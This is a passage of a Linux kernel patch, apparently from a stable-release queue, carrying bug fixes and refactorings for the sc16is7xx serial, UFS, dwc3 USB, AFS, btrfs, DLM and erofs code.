++		regmaps[i] = devm_regmap_init_spi(spi, &regcfg);
++	}
+ 
+-	return sc16is7xx_probe(&spi->dev, devtype, regmap, spi->irq);
++	return sc16is7xx_probe(&spi->dev, devtype, regmaps, spi->irq);
+ }
+ 
+ static void sc16is7xx_spi_remove(struct spi_device *spi)
+@@ -1780,7 +1793,8 @@ static int sc16is7xx_i2c_probe(struct i2c_client *i2c,
+ 			       const struct i2c_device_id *id)
+ {
+ 	const struct sc16is7xx_devtype *devtype;
+-	struct regmap *regmap;
++	struct regmap *regmaps[2];
++	unsigned int i;
+ 
+ 	if (i2c->dev.of_node) {
+ 		devtype = device_get_match_data(&i2c->dev);
+@@ -1790,11 +1804,14 @@ static int sc16is7xx_i2c_probe(struct i2c_client *i2c,
+ 		devtype = (struct sc16is7xx_devtype *)id->driver_data;
+ 	}
+ 
+-	regcfg.max_register = (0xf << SC16IS7XX_REG_SHIFT) |
+-			      (devtype->nr_uart - 1);
+-	regmap = devm_regmap_init_i2c(i2c, &regcfg);
++	for (i = 0; i < devtype->nr_uart; i++) {
++		regcfg.name = sc16is7xx_regmap_name(i);
++		regcfg.read_flag_mask = sc16is7xx_regmap_port_mask(i);
++		regcfg.write_flag_mask = sc16is7xx_regmap_port_mask(i);
++		regmaps[i] = devm_regmap_init_i2c(i2c, &regcfg);
++	}
+ 
+-	return sc16is7xx_probe(&i2c->dev, devtype, regmap, i2c->irq);
++	return sc16is7xx_probe(&i2c->dev, devtype, regmaps, i2c->irq);
+ }
+ 
+ static void sc16is7xx_i2c_remove(struct i2c_client *client)
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 474e94a69b185..9fd4e9ed93b8b 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -8333,12 +8333,9 @@ static void ufshcd_async_scan(void *data, async_cookie_t cookie)
+ 
+ out:
+ 	pm_runtime_put_sync(hba->dev);
+-	/*
+-	 * If we failed to initialize the device or the device is not
+-	 * present, turn off the power/clocks etc.
+-	 */
++
+ 	if (ret)
+-		ufshcd_hba_exit(hba);
++		dev_err(hba->dev, "%s failed: %d\n", __func__, ret);
+ }
+ 
+ static const struct attribute_group *ufshcd_driver_groups[] = {
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 137602d9076fd..c4703f6b20894 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -139,6 +139,24 @@ int dwc3_gadget_set_link_state(struct dwc3 *dwc, enum dwc3_link_state state)
+ 	return -ETIMEDOUT;
+ }
+ 
++static void dwc3_ep0_reset_state(struct dwc3 *dwc)
++{
++	unsigned int	dir;
++
++	if (dwc->ep0state != EP0_SETUP_PHASE) {
++		dir = !!dwc->ep0_expect_in;
++		if (dwc->ep0state == EP0_DATA_PHASE)
++			dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
++		else
++			dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
++
++		dwc->eps[0]->trb_enqueue = 0;
++		dwc->eps[1]->trb_enqueue = 0;
++
++		dwc3_ep0_stall_and_restart(dwc);
++	}
++}
++
+ /**
+  * dwc3_ep_inc_trb - increment a trb index.
+  * @index: Pointer to the TRB index to increment.
+@@ -2075,7 +2093,17 @@ static int dwc3_gadget_ep_dequeue(struct usb_ep *ep,
+ 
+ 	list_for_each_entry(r, &dep->pending_list, list) {
+ 		if (r == req) {
+-			dwc3_gadget_giveback(dep, req, -ECONNRESET);
++			/*
++			 * Explicitly check for EP0/1 as dequeue for those
++			 * EPs need to be handled differently.  Control EP
++			 * only deals with one USB req, and giveback will
++			 * occur during dwc3_ep0_stall_and_restart().  EP0
++			 * requests are never added to started_list.
++			 */
++			if (dep->number > 1)
++				dwc3_gadget_giveback(dep, req, -ECONNRESET);
++			else
++				dwc3_ep0_reset_state(dwc);
+ 			goto out;
+ 		}
+ 	}
+@@ -2552,16 +2580,9 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
+ 				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
+ 		if (ret == 0) {
+-			unsigned int    dir;
+-
+ 			dev_warn(dwc->dev, "wait for SETUP phase timed out\n");
+ 			spin_lock_irqsave(&dwc->lock, flags);
+-			dir = !!dwc->ep0_expect_in;
+-			if (dwc->ep0state == EP0_DATA_PHASE)
+-				dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
+-			else
+-				dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
+-			dwc3_ep0_stall_and_restart(dwc);
++			dwc3_ep0_reset_state(dwc);
+ 			spin_unlock_irqrestore(&dwc->lock, flags);
+ 		}
+ 	}
+@@ -3848,16 +3869,14 @@ static void dwc3_gadget_disconnect_interrupt(struct dwc3 *dwc)
+ 	dwc->setup_packet_pending = false;
+ 	usb_gadget_set_state(dwc->gadget, USB_STATE_NOTATTACHED);
+ 
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		unsigned int    dir;
++	dwc3_ep0_reset_state(dwc);
+ 
+-		dir = !!dwc->ep0_expect_in;
+-		if (dwc->ep0state == EP0_DATA_PHASE)
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
+-		else
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
+-		dwc3_ep0_stall_and_restart(dwc);
+-	}
++	/*
++	 * Request PM idle to address condition where usage count is
++	 * already decremented to zero, but waiting for the disconnect
++	 * interrupt to set dwc->connected to FALSE.
++	 */
++	pm_request_idle(dwc->dev);
+ }
+ 
+ static void dwc3_gadget_reset_interrupt(struct dwc3 *dwc)
+@@ -3913,20 +3932,7 @@ static void dwc3_gadget_reset_interrupt(struct dwc3 *dwc)
+ 	 * phase. So ensure that EP0 is in setup phase by issuing a stall
+ 	 * and restart if EP0 is not in setup phase.
+ 	 */
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		unsigned int	dir;
+-
+-		dir = !!dwc->ep0_expect_in;
+-		if (dwc->ep0state == EP0_DATA_PHASE)
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
+-		else
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
+-
+-		dwc->eps[0]->trb_enqueue = 0;
+-		dwc->eps[1]->trb_enqueue = 0;
+-
+-		dwc3_ep0_stall_and_restart(dwc);
+-	}
++	dwc3_ep0_reset_state(dwc);
+ 
+ 	/*
+ 	 * In the Synopsis DesignWare Cores USB3 Databook Rev. 3.30a
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 07dc4ec73520c..cf811b77ee671 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -473,6 +473,14 @@ static int afs_dir_iterate_block(struct afs_vnode *dvnode,
+ 			continue;
+ 		}
+ 
++		/* Don't expose silly rename entries to userspace. */
++		if (nlen > 6 &&
++		    dire->u.name[0] == '.' &&
++		    ctx->actor != afs_lookup_filldir &&
++		    ctx->actor != afs_lookup_one_filldir &&
++		    memcmp(dire->u.name, ".__afs", 6) == 0)
++			continue;
++
+ 		/* found the next entry */
+ 		if (!dir_emit(ctx, dire->u.name, nlen,
+ 			      ntohl(dire->u.vnode),
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 27d06bb5e5c05..cca1acf2e0371 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -1552,6 +1552,7 @@ struct btrfs_drop_extents_args {
+ 
+ struct btrfs_file_private {
+ 	void *filldir_buf;
++	u64 last_index;
+ };
+ 
+ 
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index 1331e56e8e84f..c6426080cf0ad 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -1665,6 +1665,7 @@ int btrfs_inode_delayed_dir_index_count(struct btrfs_inode *inode)
+ }
+ 
+ bool btrfs_readdir_get_delayed_items(struct inode *inode,
++				     u64 last_index,
+ 				     struct list_head *ins_list,
+ 				     struct list_head *del_list)
+ {
+@@ -1684,14 +1685,14 @@ bool btrfs_readdir_get_delayed_items(struct inode *inode,
+ 
+ 	mutex_lock(&delayed_node->mutex);
+ 	item = __btrfs_first_delayed_insertion_item(delayed_node);
+-	while (item) {
++	while (item && item->index <= last_index) {
+ 		refcount_inc(&item->refs);
+ 		list_add_tail(&item->readdir_list, ins_list);
+ 		item = __btrfs_next_delayed_item(item);
+ 	}
+ 
+ 	item = __btrfs_first_delayed_deletion_item(delayed_node);
+-	while (item) {
++	while (item && item->index <= last_index) {
+ 		refcount_inc(&item->refs);
+ 		list_add_tail(&item->readdir_list, del_list);
+ 		item = __btrfs_next_delayed_item(item);
+diff --git a/fs/btrfs/delayed-inode.h b/fs/btrfs/delayed-inode.h
+index 0163ca637a96f..fc6fae9640f82 100644
+--- a/fs/btrfs/delayed-inode.h
++++ b/fs/btrfs/delayed-inode.h
+@@ -148,6 +148,7 @@ void btrfs_destroy_delayed_inodes(struct btrfs_fs_info *fs_info);
+ 
+ /* Used for readdir() */
+ bool btrfs_readdir_get_delayed_items(struct inode *inode,
++				     u64 last_index,
+ 				     struct list_head *ins_list,
+ 				     struct list_head *del_list);
+ void btrfs_readdir_put_delayed_items(struct inode *inode,
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 2a7c9088fe1f8..0d2cc186974d5 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -1209,7 +1209,8 @@ static int btrfs_issue_discard(struct block_device *bdev, u64 start, u64 len,
+ 	u64 bytes_left, end;
+ 	u64 aligned_start = ALIGN(start, 1 << 9);
+ 
+-	if (WARN_ON(start != aligned_start)) {
++	/* Adjust the range to be aligned to 512B sectors if necessary. */
++	if (start != aligned_start) {
+ 		len -= aligned_start - start;
+ 		len = round_down(len, 1 << 9);
+ 		start = aligned_start;
+@@ -4206,6 +4207,42 @@ static int prepare_allocation_clustered(struct btrfs_fs_info *fs_info,
+ 	return 0;
+ }
+ 
++static int prepare_allocation_zoned(struct btrfs_fs_info *fs_info,
++				    struct find_free_extent_ctl *ffe_ctl)
++{
++	if (ffe_ctl->for_treelog) {
++		spin_lock(&fs_info->treelog_bg_lock);
++		if (fs_info->treelog_bg)
++			ffe_ctl->hint_byte = fs_info->treelog_bg;
++		spin_unlock(&fs_info->treelog_bg_lock);
++	} else if (ffe_ctl->for_data_reloc) {
++		spin_lock(&fs_info->relocation_bg_lock);
++		if (fs_info->data_reloc_bg)
++			ffe_ctl->hint_byte = fs_info->data_reloc_bg;
++		spin_unlock(&fs_info->relocation_bg_lock);
++	} else if (ffe_ctl->flags & BTRFS_BLOCK_GROUP_DATA) {
++		struct btrfs_block_group *block_group;
++
++		spin_lock(&fs_info->zone_active_bgs_lock);
++		list_for_each_entry(block_group, &fs_info->zone_active_bgs, active_bg_list) {
++			/*
++			 * No lock is OK here because avail is monotinically
++			 * decreasing, and this is just a hint.
++			 */
++			u64 avail = block_group->zone_capacity - block_group->alloc_offset;
++
++			if (block_group_bits(block_group, ffe_ctl->flags) &&
++			    avail >= ffe_ctl->num_bytes) {
++				ffe_ctl->hint_byte = block_group->start;
++				break;
++			}
++		}
++		spin_unlock(&fs_info->zone_active_bgs_lock);
++	}
++
++	return 0;
++}
++
+ static int prepare_allocation(struct btrfs_fs_info *fs_info,
+ 			      struct find_free_extent_ctl *ffe_ctl,
+ 			      struct btrfs_space_info *space_info,
+@@ -4216,19 +4253,7 @@ static int prepare_allocation(struct btrfs_fs_info *fs_info,
+ 		return prepare_allocation_clustered(fs_info, ffe_ctl,
+ 						    space_info, ins);
+ 	case BTRFS_EXTENT_ALLOC_ZONED:
+-		if (ffe_ctl->for_treelog) {
+-			spin_lock(&fs_info->treelog_bg_lock);
+-			if (fs_info->treelog_bg)
+-				ffe_ctl->hint_byte = fs_info->treelog_bg;
+-			spin_unlock(&fs_info->treelog_bg_lock);
+-		}
+-		if (ffe_ctl->for_data_reloc) {
+-			spin_lock(&fs_info->relocation_bg_lock);
+-			if (fs_info->data_reloc_bg)
+-				ffe_ctl->hint_byte = fs_info->data_reloc_bg;
+-			spin_unlock(&fs_info->relocation_bg_lock);
+-		}
+-		return 0;
++		return prepare_allocation_zoned(fs_info, ffe_ctl);
+ 	default:
+ 		BUG();
+ 	}
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 9a7d77c410e22..82f92b5652a77 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4689,6 +4689,8 @@ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry)
+ 	u64 root_flags;
+ 	int ret;
+ 
++	down_write(&fs_info->subvol_sem);
++
+ 	/*
+ 	 * Don't allow to delete a subvolume with send in progress. This is
+ 	 * inside the inode lock so the error handling that has to drop the bit
+@@ -4700,25 +4702,25 @@ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry)
+ 		btrfs_warn(fs_info,
+ 			   "attempt to delete subvolume %llu during send",
+ 			   dest->root_key.objectid);
+-		return -EPERM;
++		ret = -EPERM;
++		goto out_up_write;
+ 	}
+ 	if (atomic_read(&dest->nr_swapfiles)) {
+ 		spin_unlock(&dest->root_item_lock);
+ 		btrfs_warn(fs_info,
+ 			   "attempt to delete subvolume %llu with active swapfile",
+ 			   root->root_key.objectid);
+-		return -EPERM;
++		ret = -EPERM;
++		goto out_up_write;
+ 	}
+ 	root_flags = btrfs_root_flags(&dest->root_item);
+ 	btrfs_set_root_flags(&dest->root_item,
+ 			     root_flags | BTRFS_ROOT_SUBVOL_DEAD);
+ 	spin_unlock(&dest->root_item_lock);
+ 
+-	down_write(&fs_info->subvol_sem);
+-
+ 	ret = may_destroy_subvol(dest);
+ 	if (ret)
+-		goto out_up_write;
++		goto out_undead;
+ 
+ 	btrfs_init_block_rsv(&block_rsv, BTRFS_BLOCK_RSV_TEMP);
+ 	/*
+@@ -4728,7 +4730,7 @@ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry)
+ 	 */
+ 	ret = btrfs_subvolume_reserve_metadata(root, &block_rsv, 5, true);
+ 	if (ret)
+-		goto out_up_write;
++		goto out_undead;
+ 
+ 	trans = btrfs_start_transaction(root, 0);
+ 	if (IS_ERR(trans)) {
+@@ -4794,15 +4796,17 @@ out_end_trans:
+ 	inode->i_flags |= S_DEAD;
+ out_release:
+ 	btrfs_subvolume_release_metadata(root, &block_rsv);
+-out_up_write:
+-	up_write(&fs_info->subvol_sem);
++out_undead:
+ 	if (ret) {
+ 		spin_lock(&dest->root_item_lock);
+ 		root_flags = btrfs_root_flags(&dest->root_item);
+ 		btrfs_set_root_flags(&dest->root_item,
+ 				root_flags & ~BTRFS_ROOT_SUBVOL_DEAD);
+ 		spin_unlock(&dest->root_item_lock);
+-	} else {
++	}
++out_up_write:
++	up_write(&fs_info->subvol_sem);
++	if (!ret) {
+ 		d_invalidate(dentry);
+ 		btrfs_prune_dentries(dest);
+ 		ASSERT(dest->send_in_progress == 0);
+@@ -5948,6 +5952,78 @@ static struct dentry *btrfs_lookup(struct inode *dir, struct dentry *dentry,
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
++/*
++ * Find the highest existing sequence number in a directory and then set the
++ * in-memory index_cnt variable to the first free sequence number.
++ */
++static int btrfs_set_inode_index_count(struct btrfs_inode *inode)
++{
++	struct btrfs_root *root = inode->root;
++	struct btrfs_key key, found_key;
++	struct btrfs_path *path;
++	struct extent_buffer *leaf;
++	int ret;
++
++	key.objectid = btrfs_ino(inode);
++	key.type = BTRFS_DIR_INDEX_KEY;
++	key.offset = (u64)-1;
++
++	path = btrfs_alloc_path();
++	if (!path)
++		return -ENOMEM;
++
++	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
++	if (ret < 0)
++		goto out;
++	/* FIXME: we should be able to handle this */
++	if (ret == 0)
++		goto out;
++	ret = 0;
++
++	if (path->slots[0] == 0) {
++		inode->index_cnt = BTRFS_DIR_START_INDEX;
++		goto out;
++	}
++
++	path->slots[0]--;
++
++	leaf = path->nodes[0];
++	btrfs_item_key_to_cpu(leaf, &found_key, path->slots[0]);
++
++	if (found_key.objectid != btrfs_ino(inode) ||
++	    found_key.type != BTRFS_DIR_INDEX_KEY) {
++		inode->index_cnt = BTRFS_DIR_START_INDEX;
++		goto out;
++	}
++
++	inode->index_cnt = found_key.offset + 1;
++out:
++	btrfs_free_path(path);
++	return ret;
++}
++
++static int btrfs_get_dir_last_index(struct btrfs_inode *dir, u64 *index)
++{
++	int ret = 0;
++
++	btrfs_inode_lock(&dir->vfs_inode, 0);
++	if (dir->index_cnt == (u64)-1) {
++		ret = btrfs_inode_delayed_dir_index_count(dir);
++		if (ret) {
++			ret = btrfs_set_inode_index_count(dir);
++			if (ret)
++				goto out;
++		}
++	}
++
++	/* index_cnt is the index number of next new entry, so decrement it. */
++	*index = dir->index_cnt - 1;
++out:
++	btrfs_inode_unlock(&dir->vfs_inode, 0);
++
++	return ret;
++}
++
+ /*
+  * All this infrastructure exists because dir_emit can fault, and we are holding
+  * the tree lock when doing readdir.  For now just allocate a buffer and copy
+@@ -5960,10 +6036,17 @@ static struct dentry *btrfs_lookup(struct inode *dir, struct dentry *dentry,
+ static int btrfs_opendir(struct inode *inode, struct file *file)
+ {
+ 	struct btrfs_file_private *private;
++	u64 last_index;
++	int ret;
++
++	ret = btrfs_get_dir_last_index(BTRFS_I(inode), &last_index);
++	if (ret)
++		return ret;
+ 
+ 	private = kzalloc(sizeof(struct btrfs_file_private), GFP_KERNEL);
+ 	if (!private)
+ 		return -ENOMEM;
++	private->last_index = last_index;
+ 	private->filldir_buf = kzalloc(PAGE_SIZE, GFP_KERNEL);
+ 	if (!private->filldir_buf) {
+ 		kfree(private);
+@@ -5973,6 +6056,19 @@ static int btrfs_opendir(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
++static loff_t btrfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct btrfs_file_private *private = file->private_data;
++	int ret;
++
++	ret = btrfs_get_dir_last_index(BTRFS_I(file_inode(file)),
++				       &private->last_index);
++	if (ret)
++		return ret;
++
++	return generic_file_llseek(file, offset, whence);
++}
++
+ struct dir_entry {
+ 	u64 ino;
+ 	u64 offset;
+@@ -6030,7 +6126,8 @@ static int btrfs_real_readdir(struct file *file, struct dir_context *ctx)
+ 
+ 	INIT_LIST_HEAD(&ins_list);
+ 	INIT_LIST_HEAD(&del_list);
+-	put = btrfs_readdir_get_delayed_items(inode, &ins_list, &del_list);
++	put = btrfs_readdir_get_delayed_items(inode, private->last_index,
++					      &ins_list, &del_list);
+ 
+ again:
+ 	key.type = BTRFS_DIR_INDEX_KEY;
+@@ -6047,6 +6144,8 @@ again:
+ 			break;
+ 		if (found_key.offset < ctx->pos)
+ 			continue;
++		if (found_key.offset > private->last_index)
++			break;
+ 		if (btrfs_should_delete_dir_index(&del_list, found_key.offset))
+ 			continue;
+ 		di = btrfs_item_ptr(leaf, path->slots[0], struct btrfs_dir_item);
+@@ -6182,57 +6281,6 @@ static int btrfs_update_time(struct inode *inode, struct timespec64 *now,
+ 	return dirty ? btrfs_dirty_inode(inode) : 0;
+ }
+ 
+-/*
+- * find the highest existing sequence number in a directory
+- * and then set the in-memory index_cnt variable to reflect
+- * free sequence numbers
+- */
+-static int btrfs_set_inode_index_count(struct btrfs_inode *inode)
+-{
+-	struct btrfs_root *root = inode->root;
+-	struct btrfs_key key, found_key;
+-	struct btrfs_path *path;
+-	struct extent_buffer *leaf;
+-	int ret;
+-
+-	key.objectid = btrfs_ino(inode);
+-	key.type = BTRFS_DIR_INDEX_KEY;
+-	key.offset = (u64)-1;
+-
+-	path = btrfs_alloc_path();
+-	if (!path)
+-		return -ENOMEM;
+-
+-	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+-	if (ret < 0)
+-		goto out;
+-	/* FIXME: we should be able to handle this */
+-	if (ret == 0)
+-		goto out;
+-	ret = 0;
+-
+-	if (path->slots[0] == 0) {
+-		inode->index_cnt = BTRFS_DIR_START_INDEX;
+-		goto out;
+-	}
+-
+-	path->slots[0]--;
+-
+-	leaf = path->nodes[0];
+-	btrfs_item_key_to_cpu(leaf, &found_key, path->slots[0]);
+-
+-	if (found_key.objectid != btrfs_ino(inode) ||
+-	    found_key.type != BTRFS_DIR_INDEX_KEY) {
+-		inode->index_cnt = BTRFS_DIR_START_INDEX;
+-		goto out;
+-	}
+-
+-	inode->index_cnt = found_key.offset + 1;
+-out:
+-	btrfs_free_path(path);
+-	return ret;
+-}
+-
+ /*
+  * helper to find a free sequence number in a given directory.  This current
+  * code is very simple, later versions will do smarter things in the btree
+@@ -11401,7 +11449,7 @@ static const struct inode_operations btrfs_dir_inode_operations = {
+ };
+ 
+ static const struct file_operations btrfs_dir_file_operations = {
+-	.llseek		= generic_file_llseek,
++	.llseek		= btrfs_dir_llseek,
+ 	.read		= generic_read_dir,
+ 	.iterate_shared	= btrfs_real_readdir,
+ 	.open		= btrfs_opendir,
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index e8e4781c48a50..8516c70b5edc1 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -780,6 +780,9 @@ static int create_snapshot(struct btrfs_root *root, struct inode *dir,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	if (btrfs_root_refs(&root->root_item) == 0)
++		return -ENOENT;
++
+ 	if (!test_bit(BTRFS_ROOT_SHAREABLE, &root->state))
+ 		return -EINVAL;
+ 
+@@ -3500,6 +3503,10 @@ static int btrfs_ioctl_defrag(struct file *file, void __user *argp)
+ 				ret = -EFAULT;
+ 				goto out;
+ 			}
++			if (range.flags & ~BTRFS_DEFRAG_RANGE_FLAGS_SUPP) {
++				ret = -EOPNOTSUPP;
++				goto out;
++			}
+ 			/* compression requires us to start the IO */
+ 			if ((range.flags & BTRFS_DEFRAG_RANGE_COMPRESS)) {
+ 				range.flags |= BTRFS_DEFRAG_RANGE_START_IO;
+diff --git a/fs/btrfs/ref-verify.c b/fs/btrfs/ref-verify.c
+index 4b052d4009d31..8083fe866d2b4 100644
+--- a/fs/btrfs/ref-verify.c
++++ b/fs/btrfs/ref-verify.c
+@@ -883,8 +883,10 @@ int btrfs_ref_tree_mod(struct btrfs_fs_info *fs_info,
+ out_unlock:
+ 	spin_unlock(&fs_info->ref_verify_lock);
+ out:
+-	if (ret)
++	if (ret) {
++		btrfs_free_ref_cache(fs_info);
+ 		btrfs_clear_opt(fs_info->mount_opt, REF_VERIFY);
++	}
+ 	return ret;
+ }
+ 
+@@ -1015,8 +1017,8 @@ int btrfs_build_ref_tree(struct btrfs_fs_info *fs_info)
+ 		}
+ 	}
+ 	if (ret) {
+-		btrfs_clear_opt(fs_info->mount_opt, REF_VERIFY);
+ 		btrfs_free_ref_cache(fs_info);
++		btrfs_clear_opt(fs_info->mount_opt, REF_VERIFY);
+ 	}
+ 	btrfs_free_path(path);
+ 	return ret;
+diff --git a/fs/btrfs/sysfs.c b/fs/btrfs/sysfs.c
+index 74fef1f49c358..fc468d1079c2e 100644
+--- a/fs/btrfs/sysfs.c
++++ b/fs/btrfs/sysfs.c
+@@ -1704,6 +1704,10 @@ static ssize_t btrfs_devinfo_scrub_speed_max_store(struct kobject *kobj,
+ 	unsigned long long limit;
+ 
+ 	limit = memparse(buf, &endptr);
++	/* There could be trailing '\n', also catch any typos after the value. */
++	endptr = skip_spaces(endptr);
++	if (*endptr != 0)
++		return -EINVAL;
+ 	WRITE_ONCE(device->scrub_speed_max, limit);
+ 	return len;
+ }
+diff --git a/fs/btrfs/tree-checker.c b/fs/btrfs/tree-checker.c
+index 2b39c7f9226fe..02e8398246ae5 100644
+--- a/fs/btrfs/tree-checker.c
++++ b/fs/btrfs/tree-checker.c
+@@ -1399,7 +1399,7 @@ static int check_extent_item(struct extent_buffer *leaf,
+ 		if (unlikely(ptr + btrfs_extent_inline_ref_size(inline_type) > end)) {
+ 			extent_err(leaf, slot,
+ "inline ref item overflows extent item, ptr %lu iref size %u end %lu",
+-				   ptr, inline_type, end);
++				   ptr, btrfs_extent_inline_ref_size(inline_type), end);
+ 			return -EUCLEAN;
+ 		}
+ 
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 6ed09edabea0c..72f34f96d0155 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -1845,8 +1845,8 @@ static int dlm_tcp_bind(struct socket *sock)
+ 	memcpy(&src_addr, dlm_local_addr[0], sizeof(src_addr));
+ 	make_sockaddr(&src_addr, 0, &addr_len);
+ 
+-	result = sock->ops->bind(sock, (struct sockaddr *)&src_addr,
+-				 addr_len);
++	result = kernel_bind(sock, (struct sockaddr *)&src_addr,
++			     addr_len);
+ 	if (result < 0) {
+ 		/* This *may* not indicate a critical error */
+ 		log_print("could not bind for connect: %d", result);
+@@ -1860,7 +1860,7 @@ static int dlm_tcp_connect(struct connection *con, struct socket *sock,
+ {
+ 	int ret;
+ 
+-	ret = sock->ops->connect(sock, addr, addr_len, O_NONBLOCK);
++	ret = kernel_connect(sock, addr, addr_len, O_NONBLOCK);
+ 	switch (ret) {
+ 	case -EINPROGRESS:
+ 		fallthrough;
+@@ -1900,8 +1900,8 @@ static int dlm_tcp_listen_bind(struct socket *sock)
+ 
+ 	/* Bind to our port */
+ 	make_sockaddr(dlm_local_addr[0], dlm_config.ci_tcp_port, &addr_len);
+-	return sock->ops->bind(sock, (struct sockaddr *)dlm_local_addr[0],
+-			       addr_len);
++	return kernel_bind(sock, (struct sockaddr *)&dlm_local_addr[0],
++			   addr_len);
+ }
+ 
+ static const struct dlm_proto_ops dlm_tcp_ops = {
+@@ -1928,12 +1928,12 @@ static int dlm_sctp_connect(struct connection *con, struct socket *sock,
+ 	int ret;
+ 
+ 	/*
+-	 * Make sock->ops->connect() function return in specified time,
++	 * Make kernel_connect() function return in specified time,
+ 	 * since O_NONBLOCK argument in connect() function does not work here,
+ 	 * then, we should restore the default value of this attribute.
+ 	 */
+ 	sock_set_sndtimeo(sock->sk, 5);
+-	ret = sock->ops->connect(sock, addr, addr_len, 0);
++	ret = kernel_connect(sock, addr, addr_len, 0);
+ 	sock_set_sndtimeo(sock->sk, 0);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/fs/erofs/decompressor.c b/fs/erofs/decompressor.c
+index 51b7ac7166d96..0cfad74374ca9 100644
+--- a/fs/erofs/decompressor.c
++++ b/fs/erofs/decompressor.c
+@@ -122,11 +122,11 @@ static int z_erofs_lz4_prepare_dstpages(struct z_erofs_lz4_decompress_ctx *ctx,
+ }
+ 
+ static void *z_erofs_lz4_handle_overlap(struct z_erofs_lz4_decompress_ctx *ctx,
+-			void *inpage, unsigned int *inputmargin, int *maptype,
+-			bool may_inplace)
++			void *inpage, void *out, unsigned int *inputmargin,
++			int *maptype, bool may_inplace)
+ {
+ 	struct z_erofs_decompress_req *rq = ctx->rq;
+-	unsigned int omargin, total, i, j;
++	unsigned int omargin, total, i;
+ 	struct page **in;
+ 	void *src, *tmp;
+ 
+@@ -136,20 +136,20 @@ static void *z_erofs_lz4_handle_overlap(struct z_erofs_lz4_decompress_ctx *ctx,
+ 		    omargin < LZ4_DECOMPRESS_INPLACE_MARGIN(rq->inputsize))
+ 			goto docopy;
+ 
+-		for (i = 0; i < ctx->inpages; ++i) {
+-			DBG_BUGON(rq->in[i] == NULL);
+-			for (j = 0; j < ctx->outpages - ctx->inpages + i; ++j)
+-				if (rq->out[j] == rq->in[i])
+-					goto docopy;
+-		}
++		for (i = 0; i < ctx->inpages; ++i)
++			if (rq->out[ctx->outpages - ctx->inpages + i] !=
++			    rq->in[i])
++				goto docopy;
++		kunmap_local(inpage);
++		*maptype = 3;
++		return out + ((ctx->outpages - ctx->inpages) << PAGE_SHIFT);
+ 	}
+ 
+ 	if (ctx->inpages <= 1) {
+ 		*maptype = 0;
+ 		return inpage;
+ 	}
+-	kunmap_atomic(inpage);
+-	might_sleep();
++	kunmap_local(inpage);
+ 	src = erofs_vm_map_ram(rq->in, ctx->inpages);
+ 	if (!src)
+ 		return ERR_PTR(-ENOMEM);
+@@ -162,7 +162,7 @@ docopy:
+ 	src = erofs_get_pcpubuf(ctx->inpages);
+ 	if (!src) {
+ 		DBG_BUGON(1);
+-		kunmap_atomic(inpage);
++		kunmap_local(inpage);
+ 		return ERR_PTR(-EFAULT);
+ 	}
+ 
+@@ -173,9 +173,9 @@ docopy:
+ 			min_t(unsigned int, total, PAGE_SIZE - *inputmargin);
+ 
+ 		if (!inpage)
+-			inpage = kmap_atomic(*in);
++			inpage = kmap_local_page(*in);
+ 		memcpy(tmp, inpage + *inputmargin, page_copycnt);
+-		kunmap_atomic(inpage);
++		kunmap_local(inpage);
+ 		inpage = NULL;
+ 		tmp += page_copycnt;
+ 		total -= page_copycnt;
+@@ -205,16 +205,16 @@ int z_erofs_fixup_insize(struct z_erofs_decompress_req *rq, const char *padbuf,
+ }
+ 
+ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+-				      u8 *out)
++				      u8 *dst)
+ {
+ 	struct z_erofs_decompress_req *rq = ctx->rq;
+ 	bool support_0padding = false, may_inplace = false;
+ 	unsigned int inputmargin;
+-	u8 *headpage, *src;
++	u8 *out, *headpage, *src;
+ 	int ret, maptype;
+ 
+ 	DBG_BUGON(*rq->in == NULL);
+-	headpage = kmap_atomic(*rq->in);
++	headpage = kmap_local_page(*rq->in);
